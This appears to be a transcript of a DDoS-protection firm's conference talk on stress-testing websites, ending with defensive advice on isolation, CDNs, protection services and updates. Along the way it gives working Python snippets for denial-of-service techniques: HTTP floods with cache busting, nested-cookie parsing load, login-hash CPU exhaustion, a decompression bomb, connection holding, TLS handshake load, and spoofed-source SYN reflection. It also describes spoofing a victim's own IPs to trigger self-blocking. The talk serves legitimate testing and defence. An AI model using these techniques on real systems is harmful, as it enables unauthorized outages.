Variti develops protection against bots and DDoS attacks, and also conducts load and stress testing. At the HighLoad++ 2018 conference we gave a talk on how to secure resources against various types of attacks. In short: isolate parts of the system, use cloud services and CDNs, and update regularly. But you still cannot cope without specialized protection companies :) Before reading the text, you can look through the short abstracts
on the conference website.
And if you do not like reading, or just want to watch the video, our report is below under the spoiler.
Many companies already know how to do load testing, but not everyone does stress testing. Some of our customers think their site is invulnerable because they run a highload system that protects well against attacks. We show that this is not entirely true.
Of course, before running the tests we obtain the customer's permission, signed and stamped; with our help, you cannot just DDoS anyone. Testing is carried out at a time chosen by the customer, when traffic to the resource is minimal and access problems will not affect real users. Also, since something can always go wrong during testing, we stay in constant contact with the customer. This lets us not only report the results achieved but also change things in the course of testing. When testing is complete, we always compile a report pointing out the deficiencies found, with recommendations for fixing the site's weak spots.
How we work
When testing, we emulate a botnet. Since we work with clients whose resources are not on our networks, we send the load not from a single IP but from our own subnet, so that the test does not end in the first minute because limits or protection kick in. Plus, to create a significant load, we have a fairly powerful test server of our own.
Postulates
More does not mean better
The less load it takes to bring a resource to failure, the better. If you can make the site stop functioning with one request per second, or even one request per minute, that is great. Because by the law of meanness, users or attackers will accidentally hit exactly this vulnerability.
Partial failure is better than full failure
We always advise making systems heterogeneous. Moreover, the parts should be separated at the physical level, not just by containerization. With physical separation, even if something on the site fails, it most likely will not stop working completely, and users will keep access to at least part of the functionality.
Proper architecture is the foundation of resilience
The resilience of a resource, its ability to withstand attacks and load, must be laid down at the design stage, in fact at the stage of drawing the first flowcharts in a notebook. If fatal errors creep in, they can be corrected later, but it is very difficult.
Not only the code should be good, but also the config
Many people think a good development team guarantees a resilient service. A good development team really is necessary, but there must also be good operations, good DevOps: specialists who correctly configure Linux and the network, write the nginx configs correctly, set limits, and so on. Otherwise the resource will only work well in testing, and at some point everything will break in production.
Differences between load and stress testing
Load testing lets you identify the limits within which the system functions. Stress testing is aimed at finding the system's weak points; it is used to break the system and see how it behaves while certain parts fail. In this case, the nature of the load usually remains unknown to the customer before stress testing begins.
Distinctive features of L7 attacks
We usually divide load into two types: L7 and L3&4. L7 is load at the application level; most often this is taken to mean only HTTP, but we mean any load delivered over TCP.
L7 attacks have certain distinguishing features. First, they reach the application directly, so they are unlikely to be deflected by network-level tools. Such attacks exploit logic, and thanks to that they consume CPU, memory, disk, database, and other resources very efficiently with little traffic.
HTTP Flood
With any attack, the load is easier to create than to handle, and for L7 this is also true. Attack traffic is not always easy to distinguish from legitimate traffic; most often it can be done by frequency, but if everything is planned correctly, the logs give no way to tell where the attack is and where the legitimate requests are.
As a first example, consider the HTTP Flood attack. The graph shows that such attacks are usually very powerful: in the example below, the peak number of requests exceeded 600 thousand per minute.

HTTP Flood is the easiest way to create load. Usually some load testing tool is taken, for example ApacheBench, and the request and the target are set. With such a simple approach there is a high probability of hitting the server cache, but it is easy to get around: for example, by adding random strings to the request, which forces the server to continually render a fresh page.
Also, do not forget about the user-agent while creating the load. Many user-agents of popular testing tools are filtered by system administrators, in which case the load may simply never reach the backend. The result can be significantly improved by inserting a more or less valid browser header into the request.
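As a rough sketch of both tricks, here is what a cache-busting request with a browser-like user-agent might look like in Python. The target URL is a placeholder, and the requests library is just one convenient way to do it:

```python
import random
import string
import requests

# Hypothetical target; any page that is rendered server-side works.
TARGET = "https://example.com/catalog"
# A more or less valid browser header instead of the tool's default.
BROWSER_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
              "AppleWebKit/537.36 (KHTML, like Gecko) "
              "Chrome/70.0.3538.77 Safari/537.36")

with requests.Session() as session:
    for _ in range(100):
        # A random query string defeats full-page caching and forces
        # the server to render a fresh page on every request.
        junk = "".join(random.choices(string.ascii_lowercase, k=12))
        session.get(
            TARGET,
            params={"nocache": junk},
            headers={"User-Agent": BROWSER_UA},
            timeout=10,
        )
```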
Despite its simplicity, the HTTP Flood has drawbacks. First, creating the load requires a lot of capacity. Second, such attacks are very easy to detect, especially if they come from a single address. As a result, the requests immediately start being filtered, either by system administrators or even at the provider level.
What to look for
To reduce the number of requests per second without losing effectiveness, you need to show a little imagination and explore the site. You can load not only the channel or the server, but also individual parts of the application, for example the database or the file system. You can also look for places on the site that do heavy computation: calculators, product-selection pages, and so on. Finally, it often happens that a site has some PHP script that generates a page several hundred thousand lines long. Such a script also loads the server heavily and can become a target for an attack.
Where to look
When we scan a resource before testing, we look first of all, of course, at the site itself. We look for all kinds of input fields and heavy files, in general everything that can create problems for the resource and slow it down. The ordinary developer tools in Google Chrome and Firefox help here, showing page response times.
We also scan subdomains. For example, there is a certain online store, abc.com, and it has the subdomain admin.abc.com. Most likely this is an admin panel with authorization, but if you put load on it, it can create problems for the main resource.
The site may also have the subdomain api.abc.com. Most likely this is a resource for mobile applications. The application can be found on the App Store or Google Play; you can set up a special access point, dissect the API, and register test accounts. The problem is that people often think everything protected by authorization is invulnerable to denial-of-service attacks. Supposedly authorization is the best captcha, but it is not. Making 10-20 test accounts is easy, and by creating them we get access to complex and unconcealed functionality.
Naturally, we look at the history: robots.txt, WebArchive, ViewDNS; we look for old versions of the resource. Sometimes developers roll out, say, mail2.yandex.net, while the old version, mail.yandex.net, remains. That mail.yandex.net is no longer supported and gets no development resources, but it keeps consuming the database. So through the old version you can effectively burn the resources of the backend and everything behind the frontend. Of course this is not always the case, but we still run into it quite often.
Naturally, we dissect all the request parameters and the cookie structure. You can, say, stuff a JSON array with some value inside a cookie, create a lot of nesting, and make the resource parse it for an unreasonably long time.
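A quick sketch of the nested-cookie trick, assuming a hypothetical backend that deserializes a session_data cookie as JSON (both the cookie name and the target URL are made up):

```python
import requests

def nested_json(depth: int) -> str:
    # Build the JSON string directly; the parser on the server still
    # has to walk every one of the nesting levels.
    return "[" * depth + '"x"' + "]" * depth

# Cookie name and target URL are assumptions for the illustration.
requests.get(
    "https://example.com/",
    cookies={"session_data": nested_json(5000)},
    timeout=10,
)
```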
Loading the search
The first thing that comes to mind when exploring a site is to load the database, since almost everyone has a search, and almost everywhere it is, unfortunately, poorly protected. For some reason developers do not pay enough attention to search. But there is one recommendation: do not make requests of the same type, because you may run into caching, just as with the HTTP flood.
Making random queries to the database is also not always effective. It is much better to create a list of keywords relevant to the search. To return to the online-store example: say the site sells car tires and lets you set the tire radius, the car model, and other parameters. Combinations of relevant words will make the database work under much harder conditions.
In addition, it is worth using pagination: it is much harder for the search to return the penultimate page of results than the first. That is, pagination lets you vary the load a little.
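A sketch of such a search load on the tire-store example, assuming a hypothetical /search endpoint with q and page parameters; the keyword lists are made up for illustration:

```python
import random
import requests

# Keywords relevant to the hypothetical tire store: combinations of
# them hit the database much harder than random gibberish, which
# usually returns an empty result quickly.
BRANDS = ["nokian", "michelin", "pirelli", "continental"]
SEASONS = ["winter", "summer", "all-season"]
RADII = ["r15", "r16", "r17", "r18"]

def random_search() -> dict:
    query = " ".join(
        [random.choice(BRANDS), random.choice(SEASONS), random.choice(RADII)]
    )
    # Deep pages are more expensive than the first one: the database
    # has to skip over all the preceding rows.
    return {"q": query, "page": random.randint(50, 200)}

with requests.Session() as session:
    for _ in range(1000):
        session.get("https://example.com/search",
                    params=random_search(), timeout=10)
```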
The example below shows load on the search. You can see that from the very first second of the test, at a rate of ten requests per second, the site went down and stopped responding.

What if there is no search?
If there is no search, that does not mean the site has no other vulnerable input fields. That field may be authorization. Developers now like to make complex hashes to protect the login database from rainbow-table attacks. That is good, but such hashes consume a lot of CPU. A large stream of fake authorizations leads to CPU exhaustion, and as a result the site stops working.
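A minimal sketch of such a stream of fake authorizations, assuming a hypothetical login endpoint and form field names; each failed attempt still costs the server one full hash computation:

```python
import random
import string
import requests

LOGIN_URL = "https://example.com/login"   # hypothetical endpoint

def random_creds() -> dict:
    rand = lambda n: "".join(random.choices(string.ascii_lowercase, k=n))
    # Field names are assumptions; take them from the real login form.
    return {"username": rand(8), "password": rand(12)}

with requests.Session() as session:
    for _ in range(1000):
        # The server has to hash every password before it can reject it,
        # so a modest request rate translates into heavy CPU load.
        session.post(LOGIN_URL, data=random_creds(), timeout=10)
```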
Various comment and feedback forms on a site are a reason to send very large texts there or simply create a massive flood. Sometimes sites accept attachments, including gzipped ones. In that case we take a file of 1 TB in size, compress it with gzip down to a few bytes or kilobytes, and send it to the site. Then it is unarchived, and a very interesting effect is obtained.
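A sketch of preparing such a decompression bomb with Python's standard gzip module. Plain gzip compresses highly repetitive data at roughly 1000:1, so a gigabyte of zeros shrinks to about a megabyte; nesting archives shrinks it further. The upload endpoint that would receive it is left out as an assumption:

```python
import gzip
import io

def make_bomb(uncompressed_mb: int) -> bytes:
    # Highly repetitive data (all zeros) compresses extremely well,
    # but the server that unpacks it must materialize the full size.
    buf = io.BytesIO()
    with gzip.GzipFile(fileobj=buf, mode="wb", compresslevel=9) as gz:
        chunk = b"\0" * (1024 * 1024)          # 1 MB of zeros
        for _ in range(uncompressed_mb):
            gz.write(chunk)
    return buf.getvalue()

bomb = make_bomb(1024)                          # 1 GB uncompressed
print(f"compressed size: {len(bomb)} bytes")    # roughly 1 MB
```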
REST API
I would like to pay a little attention to something as popular as the REST API. Protecting a REST API is much harder than protecting a regular site. Even banal ways of protecting against password brute force and other illegitimate activity do not work for the REST API.
A REST API is very easy to break, because it accesses the database directly. At the same time, the failure of such a service has rather serious consequences for the business. The point is that not only the main site hangs off the REST API, but also the mobile application and some internal business resources. If all of that falls, the effect is much stronger than with the failure of a simple site.
Loading heavy content
If we are asked to test an ordinary single-page application, a landing page, or a business-card site with no complex functionality, we look for heavy content: large images served by the server, binary files, PDF documentation, and we try to download all of it. Such tests load the file system well and clog the channels, so they are effective. That is, even if you do not take the server down, downloading a large file at low speed will simply saturate the target server's channel, and then denial of service will occur.
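A sketch of such a deliberately slow download; run many of these in parallel and the target's channel and worker connections stay occupied. The file URL is a made-up heavy asset:

```python
import time
import requests

URL = "https://example.com/files/catalog.pdf"   # hypothetical heavy file

# Streaming keeps the connection open; reading tiny chunks with pauses
# means one client occupies a server connection for a very long time.
with requests.get(URL, stream=True, timeout=30) as resp:
    for _ in resp.iter_content(chunk_size=1024):
        time.sleep(0.5)
```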
The example of such a test shows that at 30 RPS the site stopped responding or returned 500 server errors.

Do not forget about server configuration either. You can often find that someone bought a virtual machine, installed Apache there, left everything at the defaults, deployed a PHP application, and below you can see the result.

Here the load went to the site root and amounted to only 10 RPS. We waited 5 minutes, and the server crashed. It is not known for certain why it fell, but there is an assumption that it simply ate too much memory and therefore stopped responding.
Wave attacks
In the past year or two, wave attacks have become quite popular. This is because many organizations buy one or another piece of hardware for DDoS protection that needs a certain amount of time to accumulate statistics before it starts filtering an attack. That is, they do not filter the attack in the first 30-40 seconds, because they are accumulating data and learning. Accordingly, in those 30-40 seconds you can launch so much at the site that the resource will stay down for a long time, until all the requests are raked up.
In the attack below there was a 10-minute interval, after which a new, modified portion of the attack arrived.

That is, the defense learned and started filtering, but a new, completely different portion of the attack arrived, and the defense started learning again. In effect, the filtering stops working, the protection becomes ineffective, and the site is unavailable.
Wave attacks are characterized by very high peak values: in the case of L7 they can reach a hundred thousand or even a million requests per second. If we talk about L3&4, there can be hundreds of gigabits of traffic or, counted in packets, hundreds of Mpps.
The problem with such attacks is synchronization. The attacks come from a botnet, and creating a very large one-time peak requires a high degree of synchronization. And that coordination does not always work out: sometimes the output is a parabolic peak that looks rather pitiful.
Not by HTTP alone
Besides HTTP at the L7 level, we like to exploit other protocols. As a rule, an ordinary website, especially on ordinary web hosting, has mail protocols and MySQL sticking out. Mail protocols are less subject to load than databases, but they too can be loaded quite efficiently, ending up with an overloaded CPU on the server.
The 2016 SSH vulnerability worked out really well for us. By now almost everyone has patched it, but that does not mean load cannot be sent to SSH. It can. A huge load of authorizations is simply served, SSH eats up almost the entire CPU on the server, and then the website collapses from just one or two requests per second.
Accordingly, those one or two requests cannot be distinguished from legitimate load in the logs.
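A sketch of such an SSH authorization load using the paramiko library; the host and credentials are placeholders. Each attempt forces the server through a full key exchange and an authentication check:

```python
import paramiko

HOST = "example.com"   # hypothetical target

def auth_attempt() -> None:
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        # The key exchange and password check are CPU-heavy on the
        # server side, so even failed logins eat the target's processor.
        client.connect(HOST, username="test", password="wrong", timeout=10)
    except paramiko.AuthenticationException:
        pass
    finally:
        client.close()

for _ in range(100):
    auth_attempt()
```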
Exhausting the many connections that servers keep open also remains relevant. Apache used to sin with this; now it is actually nginx that sins, because it is often left at the default configuration. The number of connections nginx can keep open is limited, so we open exactly that number of connections, nginx accepts no new ones, and the site stops working.
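A sketch of connection exhaustion with plain sockets, assuming a default-ish nginx with a limited worker_connections value; the host and connection count are placeholders. Sending a partial request keeps each connection open from the server's point of view:

```python
import socket

HOST, PORT, COUNT = "example.com", 80, 2000   # placeholders

conns = []
for _ in range(COUNT):
    try:
        s = socket.create_connection((HOST, PORT), timeout=5)
        # An unfinished request: the server waits for the rest of the
        # headers and keeps the connection in its table.
        s.sendall(b"GET / HTTP/1.1\r\nHost: " + HOST.encode() + b"\r\n")
        conns.append(s)
    except OSError:
        break   # the server has probably stopped accepting connections

print(f"holding {len(conns)} open connections")
input("press Enter to release them...")
```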
Our test cluster has enough CPU to attack the SSL handshake. As practice shows, botnets sometimes like to do this too. On the one hand, it is clear that there is no doing without SSL: Google results, ranking, security. On the other hand, SSL unfortunately has a CPU problem.
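A sketch of handshake pressure with Python's standard ssl module: complete the TLS handshake, drop the connection, repeat. The asymmetric crypto in each handshake costs the server far more than it costs the client; the host is a placeholder:

```python
import socket
import ssl

HOST, PORT = "example.com", 443   # hypothetical target
ctx = ssl.create_default_context()

for _ in range(1000):
    with socket.create_connection((HOST, PORT), timeout=10) as sock:
        # wrap_socket performs the full TLS handshake; we then simply
        # close the session and start over.
        with ctx.wrap_socket(sock, server_hostname=HOST):
            pass
```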
L3&4
When we talk about attacks at the L3&4 level, we usually talk about attacks at the channel level. Such load is almost always distinguishable from legitimate load, unless it is a SYN flood. The problem that SYN flood attacks pose for protection tools is their volume. The maximum L3&4 value we have seen was 1.5-2 Tbit/s. Such traffic is very hard to handle even for large companies, including Oracle and Google.
SYN and SYN-ACK are the packets used to establish a connection. That is why a SYN flood is hard to distinguish from legitimate load: it is unclear whether a given SYN came to establish a connection or is part of the flood.
UDP flood
Usually attackers do not have the capacity we do, so amplification can be used to organize attacks. That is, the attacker scans the Internet and finds either vulnerable or misconfigured servers that, for example, respond to a single SYN packet with three SYN-ACKs. By spoofing the source address with the address of the target server, a single packet can increase the power, say, threefold and redirect the traffic to the victim.

The problem with amplifications is that they are hard to detect. Recent examples include the sensational case of vulnerable memcached. Plus, there are now a lot of IoT devices and IP cameras, most of which run on default settings, and by default they are misconfigured, which is why attackers often run such attacks through these devices.

Tricky SYN flood
From a developer's point of view, the SYN flood is probably the most interesting of all the attacks. The problem is that system administrators often use IP blocking to protect against it. Moreover, IP blocking affects not only system administrators who act by script, but unfortunately also some protection systems bought for big money.
This method can turn into a disaster, because if the attackers spoof the IP addresses, the company will block its own subnet. When the firewall blocks its own cluster, external interactions break down, and the resource fails.
Moreover, getting your own network blocked is not hard. If the client's office has a Wi-Fi network, or if resource health is measured with various monitoring systems, then we take the IP address of that monitoring system or of the client's office Wi-Fi and use it as the source. In the end the resource seems to be available, but the target IP addresses are blocked. Thus, the Wi-Fi network of the HighLoad conference, where a new company product is being presented, may end up blocked, and that entails certain business and economic costs.
During testing we cannot use amplification through memcached or any external resources, because we have agreements to send traffic only to authorized IP addresses. So we use amplification through SYN and SYN-ACK: the system responds to one sent SYN with two or three SYN-ACKs, and at the output the attack is multiplied two or three times.
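A sketch of the underlying spoofed-SYN idea using the scapy packet-crafting library (raw injection requires root). All addresses here are documentation placeholders, not real hosts:

```python
from scapy.all import IP, TCP, send

VICTIM = "203.0.113.10"      # spoofed source: the replies land here
REFLECTOR = "198.51.100.20"  # host that answers one SYN with 2-3 SYN-ACKs

# Each spoofed SYN makes the reflector send its SYN-ACKs (plus possible
# retransmits) to the victim, multiplying the attacker's traffic.
pkt = IP(src=VICTIM, dst=REFLECTOR) / TCP(sport=12345, dport=80, flags="S")
send(pkt, count=1000, verbose=False)
```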
Tools
One of the main tools we use for load at the L7 level is Yandex.Tank. In particular, phantom is used as the gun, plus there are several scripts for generating ammo and for analyzing the results.
Tcpdump is used for analyzing network traffic, and Nmap for analyzing the server. To create load at the L3&4 level we use OpenSSL and a little of our own magic with the DPDK library. DPDK is a library from Intel that lets you work with the network interface bypassing the Linux stack, which increases efficiency. Naturally, we use DPDK not only at the L3&4 level but also at L7, because it allows a very high load flow to be created, on the order of several million requests per second from a single machine.
We also use certain traffic generators and special tools that we write for specific tests. If we recall the SSH vulnerability, the set above cannot exploit it. If we attack the mail protocol, we take mail utilities or simply write scripts on top of them.
Conclusions
To sum up, I would like to say:
- In addition to classic load testing, stress testing must be conducted. We have a real example where a partner's subcontractor did only load testing. It showed that the resource withstands the normal load. But then a non-standard load appeared, site visitors started using the resource a little differently, and as a result the subcontractor went down. So it is worth looking for vulnerabilities even if you are already protected from DDoS attacks.
- It is necessary to isolate some parts of the system from others. If you have a search, move it to separate machines, that is, not even into Docker. Because if search or authorization fails, at least something will keep working. In the case of an online store, users will still find products in the catalog, come over from the aggregator, and buy if they are already authorized or authorize via OAuth2.
- Do not neglect all sorts of cloud services.
- Use a CDN not only to optimize network latency, but also as a means of protection against channel-exhaustion attacks and plain flooding of static content.
- It is necessary to use specialized protection services. You cannot defend against L3&4 attacks at the channel level on your own, because most likely you simply do not have a big enough channel. You are also unlikely to fight off L7 attacks, since they can be very large. Plus, hunting down small attacks is still the prerogative of special services and special algorithms.
- Update regularly. This applies not only to the kernel, but also to the SSH daemon, especially if it is open to the outside. In principle, everything needs updating, because you are unlikely to track every vulnerability yourself.